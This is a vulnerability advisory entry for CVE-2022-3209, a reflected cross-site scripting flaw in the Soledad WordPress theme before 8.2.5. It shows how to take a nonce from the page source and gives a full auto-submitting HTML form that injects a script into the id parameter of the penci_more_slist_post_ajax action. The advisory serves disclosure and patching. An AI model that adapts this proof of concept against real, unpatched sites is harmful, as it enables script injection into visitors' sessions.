Lucene search
Truoc PhanWPEX-ID:7A244FB1-FA0B-4294-9B51-588BF5D673A2HistorySep 13, 2022 - 12:00 a.m.
Soledad < 8.2.5 - Reflected Cross-site Scripting
2022-09-1300:00:00
Truoc Phan
135
threat actor
ajax_var_more
compromised site
EPSS
0.001
Percentile
34.0%
The theme does not sanitise the {id,datafilter[type],…} parameters in its penci_more_slist_post_ajax AJAX action, leading to a Reflected Cross-Site Scripting (XSS) vulnerability.
A threat actor can collect the nonce value on the main webpage by searching for it on the ajax_var_more call:
var ajax_var_more = {"url":"https:\/\/soledaddemo.pencidesign.net\/wp-admin\/admin-ajax.php","nonce":"d6c491629c","errorPass":"<p class=\"message message-error\">Password does not match the confirm password<\/p>","login":"Email Address","password":"Password","headerstyle":"default"};
And then can create a webpage redirecting the user to a compromised version of the site such as:
```
<html>
<body onload="myform.submit()">
<form action="https://soledaddemo.pencidesign.net/wp-admin/admin-ajax.php" method="POST" name="myform">
<input type="hidden" name="action" value="penci_more_slist_post_ajax" />
<input type="hidden" name="id" value=""><script>alert`XSS-Checker`</script>" />
<input type="hidden" name="nonce" value="d6c491629c" />
</form>
</body>
</html>
```Related
patchstack
patchstack
wpvulndb
wpvulndb
Soledad < 8.2.5 - Reflected Cross-site Scripting
2022-09-13 00:00:00
cve
cve
CVE-2022-3209
2022-10-10 21:15:11
nvd
nvd
CVE-2022-3209
2022-10-10 21:15:11
prion
prion
Cross site scripting
2022-10-10 21:15:00
cvelist
cvelist
CVE-2022-3209 Soledad < 8.2.5 - Reflected Cross-site Scripting
2022-10-10 00:00:00
cnvd
cnvd
WordPress soledad cross-site scripting vulnerability
2022-10-12 00:00:00